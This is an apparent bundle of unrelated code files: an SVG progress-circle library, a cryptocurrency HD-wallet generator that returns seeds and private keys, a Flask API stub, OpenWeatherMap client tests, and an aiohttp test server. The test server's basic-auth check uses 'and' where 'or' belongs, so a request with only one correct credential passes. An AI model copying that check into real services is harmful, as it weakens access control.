var elId = options.id;
this._el = document.getElementById(elId);
if (this._el === null) return;
this._radius = options.radius || 10;
this._duration = options.duration === undefined ? 500 : options.duration;
this._value = 0;
this._maxValue = options.maxValue || 100;
this._text = options.text === undefined ? function(value){return this.htmlifyNumber(value);} : options.text;
this._strokeWidth = options.width || 10;
this._colors = options.colors || ['#EEE', '#F00'];
this._svg = null;
this._movingPath = null;
this._wrapContainer = null;
this._textContainer = null;
this._wrpClass = options.wrpClass || 'circles-wrp';
this._textClass = options.textClass || 'circles-text';
this._valClass = options.valueStrokeClass || 'circles-valueStroke';
this._maxValClass = options.maxValueStrokeClass || 'circles-maxValueStroke';
this._styleWrapper = options.styleWrapper === false ? false : true;
this._styleText = options.styleText === false ? false : true;
var endAngleRad = Math.PI / 180 * 270;
this._start = -Math.PI / 180 * 90;
this._startPrecise = this._precise(this._start);
this._circ = endAngleRad - this._start;
this._generate().update(options.value || 0);
};
Circles.prototype = {
VERSION: '0.0.6',
_generate: function() {
this._svgSize = this._radius * 2;
this._radiusAdjusted = this._radius - (this._strokeWidth / 2);
this._generateSvg()._generateText()._generateWrapper();
this._el.innerHTML = '';
this._el.appendChild(this._wrapContainer);
return this;
},
_setPercentage: function(percentage) {
this._movingPath.setAttribute('d', this._calculatePath(percentage, true));
this._textContainer.innerHTML = this._getText(this.getValueFromPercent(percentage));
},
_generateWrapper: function() {
this._wrapContainer = document.createElement('div');
this._wrapContainer.className = this._wrpClass;
if (this._styleWrapper) {
this._wrapContainer.style.position = 'relative';
this._wrapContainer.style.display = 'inline-block';
}
this._wrapContainer.appendChild(this._svg);
this._wrapContainer.appendChild(this._textContainer);
return this;
},
_generateText: function() {
this._textContainer = document.createElement('div');
this._textContainer.className = this._textClass;
if (this._styleText) {
var style = {
position: 'absolute',
top: 0,
left: 0,
textAlign: 'center',
width: '100%',
fontSize: (this._radius * .7) + 'px',
height: this._svgSize + 'px',
lineHeight: this._svgSize + 'px'
};
for(var prop in style) {
this._textContainer.style[prop] = style[prop];
}
}
this._textContainer.innerHTML = this._getText(0);
return this;
},
_getText: function(value) {
if (!this._text) return '';
if (value === undefined) value = this._value;
value = parseFloat(value.toFixed(2));
return typeof this._text === 'function' ? this._text.call(this, value) : this._text;
},
_generateSvg: function() {
this._svg = document.createElementNS('http://www.w3.org/2000/svg', 'svg');
this._svg.setAttribute('xmlns', 'http://www.w3.org/2000/svg');
this._svg.setAttribute('width', this._svgSize);
this._svg.setAttribute('height', this._svgSize);
this._generatePath(100, false, this._colors[0], this._maxValClass)._generatePath(1, true, this._colors[1], this._valClass);
this._movingPath = this._svg.getElementsByTagName('path')[1];
return this;
},
_generatePath: function(percentage, open, color, pathClass) {
var path = document.createElementNS('http://www.w3.org/2000/svg', 'path');
path.setAttribute('fill', 'transparent');
path.setAttribute('stroke', color);
path.setAttribute('stroke-width', this._strokeWidth);
path.setAttribute('d', this._calculatePath(percentage, open));
path.setAttribute('class', pathClass);
this._svg.appendChild(path);
return this;
},
_calculatePath: function(percentage, open) {
var end = this._start + ((percentage / 100) * this._circ),
endPrecise = this._precise(end);
return this._arc(endPrecise, open);
},
_arc: function(end, open) {
var endAdjusted = end - 0.001,
longArc = end - this._startPrecise < Math.PI ? 0 : 1;
return [
'M',
this._radius + this._radiusAdjusted * Math.cos(this._startPrecise),
this._radius + this._radiusAdjusted * Math.sin(this._startPrecise),
'A', // arcTo
this._radiusAdjusted, // x radius
this._radiusAdjusted, // y radius
0, // slanting
longArc, // long or short arc
1, // clockwise
this._radius + this._radiusAdjusted * Math.cos(endAdjusted),
this._radius + this._radiusAdjusted * Math.sin(endAdjusted),
open ? '' : 'Z' // close
].join(' ');
},
_precise: function(value) {
return Math.round(value * 1000) / 1000;
},
/*== Public methods ==*/
htmlifyNumber: function(number, integerPartClass, decimalPartClass) {
integerPartClass = integerPartClass || 'circles-integer';
decimalPartClass = decimalPartClass || 'circles-decimals';
var parts = (number + '').split('.'),
html = '<span class="' + integerPartClass + '">' + parts[0]+'</span>';
if (parts.length > 1) {
html += '<span class="' + decimalPartClass + '">' + parts[1].substring(0, 2) + '</span>';
}
return html;
},
updateRadius: function(radius) {
this._radius = radius;
return this._generate().update(true);
},
updateWidth: function(width) {
this._strokeWidth = width;
return this._generate().update(true);
},
updateColors: function(colors) {
this._colors = colors;
var paths = this._svg.getElementsByTagName('path');
paths[0].setAttribute('stroke', colors[0]);
paths[1].setAttribute('stroke', colors[1]);
return this;
},
getPercent: function() {
return (this._value * 100) / this._maxValue;
},
getValueFromPercent: function(percentage) {
return (this._maxValue * percentage) / 100;
},
getValue: function()
{
return this._value;
},
getMaxValue: function()
{
return this._maxValue;
},
update: function(value, duration) {
if (value === true) {//Force update with current value
this._setPercentage(this.getPercent());
return this;
}
if (this._value == value || isNaN(value)) return this;
if (duration === undefined) duration = this._duration;
var self = this,
oldPercentage = self.getPercent(),
delta = 1,
newPercentage, isGreater, steps, stepDuration;
this._value = Math.min(this._maxValue, Math.max(0, value));
    if (!duration) {//No duration: set the value immediately and skip the animation
this._setPercentage(this.getPercent());
return this;
}
newPercentage = self.getPercent();
isGreater = newPercentage > oldPercentage;
delta += newPercentage % 1; //If new percentage is not an integer, we add the decimal part to the delta
steps = Math.floor(Math.abs(newPercentage - oldPercentage) / delta);
stepDuration = duration / steps;
(function animate(lastFrame) {
if (isGreater)
oldPercentage += delta;
else
oldPercentage -= delta;
if ((isGreater && oldPercentage >= newPercentage) || (!isGreater && oldPercentage <= newPercentage))
{
requestAnimFrame(function(){ self._setPercentage(newPercentage); });
return;
}
requestAnimFrame(function() { self._setPercentage(oldPercentage); });
var now = Date.now(),
deltaTime = now - lastFrame;
if (deltaTime >= stepDuration) {
animate(now);
} else {
setTimeout(function() {
animate(Date.now());
}, stepDuration - deltaTime);
}
})(Date.now());
return this;
}
};
Circles.create = function(options) {
return new Circles(options);
};
return Circles;
}));
|
# Tasks module.
# ===================================
labels = ("completed", "started", "created_at", "modified", "depends_from",
"priority", "description", "identifier")
class Task(object):
"""Simple task class"""
def __init__(self, info, table):
self.info = info
self.table = table
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from .utils import (
Wallet, HDPrivateKey, HDKey
)
from .network import *
import inspect
def generate_mnemonic(strength=128):
_, seed = HDPrivateKey.master_key_from_entropy(strength=strength)
return seed
def generate_child_id():
now = datetime.now()
seconds_since_midnight = (now - now.replace(
hour=0, minute=0, second=0, microsecond=0)).total_seconds()
return int((int(now.strftime(
'%y%m%d')) + seconds_since_midnight*1000000) // 100)
def create_address(network='btctest', xpub=None, child=None, path=0):
assert xpub is not None
if child is None:
child = generate_child_id()
if network == 'ethereum' or network.upper() == 'ETH':
acct_pub_key = HDKey.from_b58check(xpub)
keys = HDKey.from_path(
acct_pub_key, '{change}/{index}'.format(change=path, index=child))
res = {
"path": "m/" + str(acct_pub_key.index) + "/" + str(keys[-1].index),
"bip32_path": "m/44'/60'/0'/" + str(acct_pub_key.index) + "/" + str(keys[-1].index),
"address": keys[-1].address()
}
if inspect.stack()[1][3] == "create_wallet":
res["xpublic_key"] = keys[-1].to_b58check()
return res
# else ...
wallet_obj = Wallet.deserialize(xpub, network=network.upper())
child_wallet = wallet_obj.get_child(child, is_prime=False)
net = get_network(network)
return {
"path": "m/" + str(wallet_obj.child_number) + "/" +str(child_wallet.child_number),
"bip32_path": net.BIP32_PATH + str(wallet_obj.child_number) + "/" +str(child_wallet.child_number),
"address": child_wallet.to_address(),
# "xpublic_key": child_wallet.serialize_b58(private=False),
# "wif": child_wallet.export_to_wif() # needs private key
}
def get_network(network='btctest'):
network = network.lower()
if network == "bitcoin_testnet" or network == "btctest":
return BitcoinTestNet
elif network == "bitcoin" or network == "btc":
return BitcoinMainNet
elif network == "dogecoin" or network == "doge":
return DogecoinMainNet
elif network == "dogecoin_testnet" or network == "dogetest":
return DogecoinTestNet
elif network == "litecoin" or network == "ltc":
return LitecoinMainNet
elif network == "litecoin_testnet" or network == "ltctest":
return LitecoinTestNet
elif network == "bitcoin_cash" or network == "bch":
return BitcoinCashMainNet
elif network == "bitcoin_gold" or network == "btg":
return BitcoinGoldMainNet
elif network == "dash":
return DashMainNet
elif network == "dash_testnet" or network == 'dashtest':
return DashTestNet
elif network == 'omni':
return OmniMainNet
elif network == 'omni_testnet':
return OmniTestNet
elif network == "feathercoin" or network == 'ftc':
return FeathercoinMainNet
elif network == "qtum":
return QtumMainNet
elif network == "qtum_testnet" or network == "qtumtest":
return QtumTestNet
return BitcoinTestNet
def create_wallet(network='btctest', seed=None, children=1):
if seed is None:
seed = generate_mnemonic()
net = get_network(network)
wallet = {
"coin": net.COIN,
"seed": seed,
"private_key": "",
"public_key": "",
"xprivate_key": "",
"xpublic_key": "",
"address": "",
"wif": "",
"children": []
}
if network == 'ethereum' or network.upper() == 'ETH':
wallet["coin"] = "ETH"
master_key = HDPrivateKey.master_key_from_mnemonic(seed)
root_keys = HDKey.from_path(master_key, "m/44'/60'/0'")
acct_priv_key = root_keys[-1]
acct_pub_key = acct_priv_key.public_key
wallet["private_key"] = acct_priv_key.to_hex()
wallet["public_key"] = acct_pub_key.to_hex()
wallet["xprivate_key"] = acct_priv_key.to_b58check()
wallet["xpublic_key"] = acct_pub_key.to_b58check()
child_wallet = create_address(
network=network.upper(), xpub=wallet["xpublic_key"],
child=0, path=0)
wallet["address"] = child_wallet["address"]
wallet["xpublic_key_prime"] = child_wallet["xpublic_key"]
# get public info from first prime child
for child in range(children):
child_wallet = create_address(
network=network.upper(), xpub=wallet["xpublic_key"],
child=child, path=0
)
wallet["children"].append({
"address": child_wallet["address"],
"xpublic_key": child_wallet["xpublic_key"],
"path": "m/" + str(child),
"bip32_path": "m/44'/60'/0'/" + str(child),
})
else:
my_wallet = Wallet.from_master_secret(
network=network.upper(), seed=seed)
# account level
wallet["private_key"] = my_wallet.private_key.get_key().decode()
wallet["public_key"] = my_wallet.public_key.get_key().decode()
wallet["xprivate_key"] = my_wallet.serialize_b58(private=True)
wallet["xpublic_key"] = my_wallet.serialize_b58(private=False)
wallet["address"] = my_wallet.to_address()
wallet["wif"] = my_wallet.export_to_wif().decode()
prime_child_wallet = my_wallet.get_child(0, is_prime=True)
wallet["xpublic_key_prime"] = prime_child_wallet.serialize_b58(private=False)
# prime children
for child in range(children):
child_wallet = my_wallet.get_child(child, is_prime=False, as_private=False)
wallet["children"].append({
"xpublic_key": child_wallet.serialize_b58(private=False),
"address": child_wallet.to_address(),
"path": "m/" + str(child),
"bip32_path": net.BIP32_PATH + str(child_wallet.child_number),
})
return wallet
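# Usage sketch (network names, child counts and indices are illustrative):
#
#   wallet = create_wallet(network='btctest', children=2)
#   extra = create_address(network='btctest',
#                          xpub=wallet['xpublic_key'], child=3)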
|
"""Controller for the api/ endpoint, test with api/getstuff"""
from flask import Blueprint
mod = Blueprint('api', __name__)
@mod.route('/getstuff')
def getstuff():
return '{"result" : "You are accessing the api"}'
@mod.route('/device/<int:device_id>/data')
@mod.route('/registry/<int:reg_id>/data/<int:device_id>')
def getjsondata(device_id=False, reg_id=False):
print "got json request!"
if device_id == False:
jsonfied = listmenujson(reg_id)
return jsonfied
else:
jsonfied = getitemjson(reg_id, device_id)
return jsonfied
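# Usage sketch (assumes the blueprint is registered under an /api prefix; paths are
# illustrative):
#   GET /api/getstuff                            -> '{"result" : "You are accessing the api"}'
#   GET /api/device/<device_id>/data             -> JSON data for a single device
#   GET /api/registry/<reg_id>/data/<device_id>  -> JSON data for a device in a registry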
|
/* eslint no-underscore-dangle: ["error", { "allow": ["__get__"] }] */
'use strict';
const Mocha = require('mocha');
const Chai = require('chai');
const jsdocx = require('jsdoc-x');
const http = require('http');
const rewire = require('rewire');
const qs = require('querystring');
const EventEmitter = require('events');
const moment = require('moment');
const { Test, Suite } = Mocha;
const { expect } = Chai;
const serverEmitter = new EventEmitter();
const serverPort = 3334;
const serverAddress = '127.0.0.1';
const serverHost = `http://${serverAddress}`;
const serverValidKey = 'validKey';
let server;
const OpenWeatherMap = require('../../index');
function generateArgsFromParams(params) {
const parameters = ((Array.isArray(params)) ? params : [])
.slice(0)
.map((param) => {
return param.type;
})
.map((param) => {
if (param.includes('Array.<')) {
switch (param.substr(7, (param.length - 8))) {
case 'String':
return ['test1', 'test2', 'test3'];
case 'Number':
return [5, 7, 9];
case 'Object':
return [{ test: true }, { test: false }];
default:
return [];
}
} else {
switch (param) {
case 'options={}':
return {};
case 'String':
return 'test1';
case 'Number':
return 5;
case 'Object':
return { test: true };
case 'CityIDReqParams':
return { id: 'London' };
case 'Coordinate':
return { latitude: 51.509865, longitude: -0.118092 };
case 'PollutionParams':
return {
coordinates: { latitude: 51.509865, longitude: -0.118092 },
datetime: moment()
};
default:
return null;
}
}
});
return parameters;
}
/**
* @method getFunctionArgumentNames
* @description parses a function to determine its arguments and returns them as a string
* @param {Function} func the function to parse
 * @returns {String[]} an array of argument names for the supplied function
*/
function getFunctionArgumentNames(func) {
const argMatches = func.toString().match(/\(([^)]*)\)/);
const argString = (argMatches && Array.isArray(argMatches) && argMatches.length >= 2)
? argMatches[1]
: '';
return argString.split(',').map((arg) => { return arg.trim().replace('={}', ''); });
}
/**
* @method getAPITests
 * @description gets all of the js files within the lib directory and parses their jsdoc tags in
 * order to procedurally generate tests based on the jsdocs. This requires certain tags to be
 * present, such as the type (used to determine what type of request), as well as the item under
 * test needing to be an inner method of a class.
* @summary parse api jsdocs to generate test list
* @returns {Promise} resolves with an object containing the jsdoc info or rejects with an error
*/
function getAPITests() {
return jsdocx.parse('./lib/*.js')
.then((docs) => {
const innerMethods = docs
.filter((doc) => { // only get methods
return doc.scope === 'inner' && doc.access && doc.access === 'public';
})
.map((doc) => { // map the docs to remove useless data
return {
params: (doc.params)
? doc.params
.map((param) => {
return {
type: param.type.names[0],
name: param.name.replace('={}', ''),
optional: (param.optional && param.optional === true)
};
})
.filter((param) => {
return !param.name.includes('.');
})
: [],
memberof: doc.memberof,
description: doc.description,
see: doc.see,
name: doc.name
};
})
.reduce((methods, doc) => { // sort all the functions into categories (mixins)
if (!methods[doc.memberof]) {
methods[doc.memberof] = [];
}
methods[doc.memberof].push(doc);
return methods;
}, {});
return innerMethods;
});
}
const apiSuite = new Suite('civocloud-nodejs api tests');
module.exports = () => {
return getAPITests()
.then((methods) => {
apiSuite.beforeAll('Test Endpoint setup', (done) => {
server = http.createServer((req, res) => {
let data = '';
req.on('data', (chunk) => { data += chunk; });
req.on('end', () => {
serverEmitter.emit('receivedRequest', {
req,
body: qs.parse(data) || {},
params: (req.url.includes('?'))
? qs.parse(req.url.split('?')[1]) || {}
: {}
});
res.writeHead(200);
res.write('{}');
res.end();
});
});
server.on('listening', () => {
done();
});
server.listen(serverPort, serverAddress);
});
apiSuite.afterAll('Test Endpoint destroy', (done) => {
server.close((err) => {
done(err);
});
});
const innerMethods = methods;
const outerMethods = Object.keys(methods);
for (let o = 0, oLength = outerMethods.length; o < oLength; o += 1) {
const testSuite = new Suite(`${outerMethods[o]}`);
for (let i = 0, iLength = innerMethods[outerMethods[o]].length; i < iLength; i += 1) {
const method = innerMethods[outerMethods[o]][i];
const methodSuite = new Suite(`${method.name}()`);
methodSuite.timeout(5000);
methodSuite.addTest(new Test('Function exposed', () => {
const owm = new OpenWeatherMap.OpenWeatherMap({ apiKey: 'test' });
expect(owm[method.name]).to.be.a('function', 'method is not exposed as a function');
}));
methodSuite.addTest(new Test('Function has description', () => {
expect(method.description).to.not.be.equal(undefined);
expect(method.description).to.not.be.equal(null);
expect(method.description).to.not.be.equal('');
}));
methodSuite.addTest(new Test('Function has see link to openweathermap.org', () => {
expect(method.see).to.not.be.equal(undefined);
expect(method.see).to.be.an('array');
expect(method.see).to.have.lengthOf(1);
expect(method.see).to.include.to.match(/{@link https:\/\/openweathermap\.org.+/);
}));
if (/\[GET|POST|PUT|HEAD|DELETE|OPTIONS\]/.test(method.description)) {
// request stuff here
methodSuite.addTest(new Test('Function calls API endpoint', (done) => {
const methodType = method.description
.match(/\[(GET|POST|PUT|HEAD|DELETE|OPTIONS)\]/)[1];
const MUTT = new OpenWeatherMap.OpenWeatherMap({
apiKey: serverValidKey,
host: serverAddress,
port: serverPort
});
serverEmitter.once('receivedRequest', (payload) => {
expect(payload.req.headers).to.deep.include({ accept: 'application/json' });
expect(payload.params).to.include.keys(['APPID']);
expect(payload.req.method).to.be.equal(methodType);
done();
});
MUTT[method.name](...generateArgsFromParams(method.params))
.catch((err) => {
done(err);
});
}));
}
methodSuite.addTest(new Test('Correct Parameters', () => {
const owm = new OpenWeatherMap.OpenWeatherMap({ apiKey: 'test' });
const nonOptionalParams = method.params
.filter((param) => {
return ((!param.optional || (param.optional && param.optional === false))
&& param.name !== '');
})
.map((param) => {
return param.name;
});
const hasOptionals = method.params
.map((param) => {
return param.optional || false;
})
.reduce((hasOptional, arg) => {
return (hasOptional || arg);
}, false);
if (hasOptionals === true) {
nonOptionalParams.push('options');
}
if (nonOptionalParams.length === 0) {
nonOptionalParams.push('');
}
expect(getFunctionArgumentNames(owm[method.name])).to.have.members(nonOptionalParams);
expect(owm[method.name]).to.be.an('function');
}));
testSuite.addSuite(methodSuite);
}
apiSuite.addSuite(testSuite);
}
const sendRequestSuite = new Suite('sendRequest functional tests');
sendRequestSuite.addTest(new Test('sendRequest exists', () => {
const owm = new OpenWeatherMap.OpenWeatherMap({ apiToken: 'test' });
expect(owm.sendRequest).to.not.be.equal(undefined);
expect(owm.sendRequest).to.be.an('function');
}));
apiSuite.addSuite(sendRequestSuite);
const parsePartialDateTimeSuite = new Suite('parsePartialDateTime functional tests');
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime exists', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
expect(parsePartialDateTime).to.not.be.equal(undefined);
expect(parsePartialDateTime).to.be.an('function');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime no datetime data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({});
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime only year data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({ year: 2017 });
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({ year: 2017, month: 12 });
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-day data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({ year: 2017, month: 12, day: 24 });
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-dayThour data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-dayThour:minute data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16,
minute: 38
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:38Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-dayThour:minute:second data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16,
minute: 38,
second: 32
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:38:32Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime all terms missing month data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
day: 24,
hour: 16,
minute: 38,
second: 32
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime all terms missing minute data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16,
second: 32
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16Z');
done();
}));
apiSuite.addSuite(parsePartialDateTimeSuite);
const formatDateTimeSuite = new Suite('formatDateTime functional tests');
formatDateTimeSuite.addTest(new Test('formatDateTime exists', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
expect(formatDateTime).to.not.be.equal(undefined);
expect(formatDateTime).to.be.an('function');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime returns null', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime({});
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using moment', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime(moment('2017-12-24T16:47:03Z'));
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:47:03.000Z');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using native Date', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime(new Date(1514134023000)); // is '2017-12-24T16:47:03.000Z'
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:47:03.000Z');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using partial date object', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime({ year: 2017, month: 12, day: 24 });
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24Z');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using manual string', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime('2017-12-24T16:47:03.000Z');
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:47:03.000Z');
done();
}));
apiSuite.addSuite(formatDateTimeSuite);
const formatCoordinatesSuite = new Suite('formatCoordinates functional tests');
formatCoordinatesSuite.addTest(new Test('formatCoordinates exists', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
expect(formatCoordinates).to.not.be.equal(undefined);
expect(formatCoordinates).to.be.an('function');
done();
}));
formatCoordinatesSuite.addTest(new Test('formatCoordinates returns null on empty input', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
const result = formatCoordinates();
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
formatCoordinatesSuite.addTest(new Test('formatCoordinates returns null on empty object', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
const result = formatCoordinates({});
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
formatCoordinatesSuite.addTest(new Test('formatCoordinates returns string with coordinates', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
const result = formatCoordinates({ latitude: 12.3456, longitude: 7.89 });
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('12.3456,7.89');
done();
}));
apiSuite.addSuite(formatCoordinatesSuite);
return apiSuite;
});
};
|
import { createGlobalStyle } from 'styled-components'
const GlobalStyle = createGlobalStyle`
  @import url('https://fonts.googleapis.com/css?family=Roboto');
  * {
box-sizing: border-box;
padding: 0;
margin: 0;
outline: 0;
}
  body, html {
background: #eee;
font-family: Roboto, sans-serif;
height: 100%;
width: 100%;
}
`
const GlobalTheme = {
primary: '#ff0198',
secondary: '#01c1d6',
//danger: '#eb238e',
danger: 'green',
light: '#f4f4f4',
dark: '#222'
};
export {
GlobalStyle,
GlobalTheme
}
|
# Use aiohttp's server support for this test backend, since it already ships as part of aiohttp.
import asyncio
import socket
import ssl
import subprocess
from dataclasses import dataclass, field
from http import HTTPStatus
from pathlib import Path
from tempfile import NamedTemporaryFile
from typing import Optional
import structlog
from aiohttp import BasicAuth, web
from .models import Pet, Pets
routes = web.RouteTableDef()
logger = structlog.get_logger(__name__)
@routes.get("/api/v1/str")
async def get_str(request: web.Request):
return web.Response(text="boo")
@routes.get("/api/v1/bearer_protected_str")
async def get_bearer_protected_str(request: web.Request):
logger.info(auth=request.headers.get("Authorization"))
if request.headers.get("authorization", "") != "Bearer let-the-bear-in":
raise web.HTTPForbidden()
return web.Response(text="you have made it through")
@routes.get("/api/v1/basic_protected_str")
async def get_basic_protected_str(request: web.Request):
logger.info(auth=request.headers.get("Authorization"))
auth_info = request.headers.get("authorization", "")
if not auth_info:
raise web.HTTPForbidden()
try:
auth = BasicAuth.decode(auth_info)
except ValueError:
logger.exception(f"Failed to decode auth data {auth_info}")
raise web.HTTPBadRequest()
if auth.login != "emu" and auth.password != "wars":
raise web.HTTPForbidden()
return web.Response(text="you have made it through")
@routes.get("/api/v1/bytes")
async def get_bytes(request: web.Request):
return web.Response(body=b"bin-boo")
@routes.get("/api/v1/int")
async def get_int(request: web.Request):
return web.Response(text="1")
@routes.get("/api/v1/json_int")
async def get_json_int(request: web.Request):
return web.json_response(1)
@routes.get("/api/v1/json_str")
async def get_json_str(request: web.Request):
return web.json_response("boo")
@routes.delete("/api/v1/pets/1")
async def delete_pet(request: web.Request):
return web.Response(status=HTTPStatus.NO_CONTENT)
@routes.get("/api/v1/pets/1")
async def get_pet(request: web.Request):
return web.json_response(Pet(name="foo").dict())
@routes.put("/api/v1/pets/1")
async def put_pet(request: web.Request):
pet_info = await request.json()
return web.json_response(Pet(name=pet_info["name"]).dict())
@routes.get("/api/v1/pets")
async def get_pets(request: web.Request):
pets = Pets(__root__=[Pet(name="foo"), Pet(name="bar")])
return web.json_response(pets.dict()["__root__"])
@routes.post("/api/v1/pets")
async def post_pets(request: web.Request):
pet_info = await request.json()
return web.json_response(Pet(name=pet_info["name"]).dict())
@routes.post("/api/v1/pets/_from_form")
async def post_pets_form(request: web.Request):
pet_form = await request.post()
return web.json_response(Pet(name=pet_form["name"]).dict())
@routes.get("/api/v1/pets/2")
async def get_missing_pet(request: web.Request):
raise web.HTTPNotFound(body="No such pet")
@routes.get("/api/v1/pets/slow")
async def get_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.post("/api/v1/pets/slow")
async def post_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.put("/api/v1/pets/slow")
async def put_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.delete("/api/v1/pets/slow")
async def delete_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.post("/api/v1/pets/1/photo")
async def set_pet_photo(request: web.Request):
data = await request.post()
return web.Response(text=data["photo"].file.read().decode())
@dataclass
class Server:
port: int = field(init=False)
sock: socket.socket = field(init=False)
site: web.SockSite = field(init=False, repr=False)
def __post_init__(self) -> None:
self.sock = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
self.sock.bind(("localhost", 0))
_, self.port = self.sock.getsockname()
async def start(self, ssl_context: Optional[ssl.SSLContext] = None) -> None:
app = web.Application()
app.add_routes(routes)
runner = web.AppRunner(app)
await runner.setup()
self.site = web.SockSite(runner=runner, sock=self.sock, ssl_context=ssl_context)
await self.site.start()
logger.info("Server is up", port=self.port)
async def stop(self) -> None:
await self.site.stop()
logger.info("Server stopped")
self.sock.close()
@dataclass
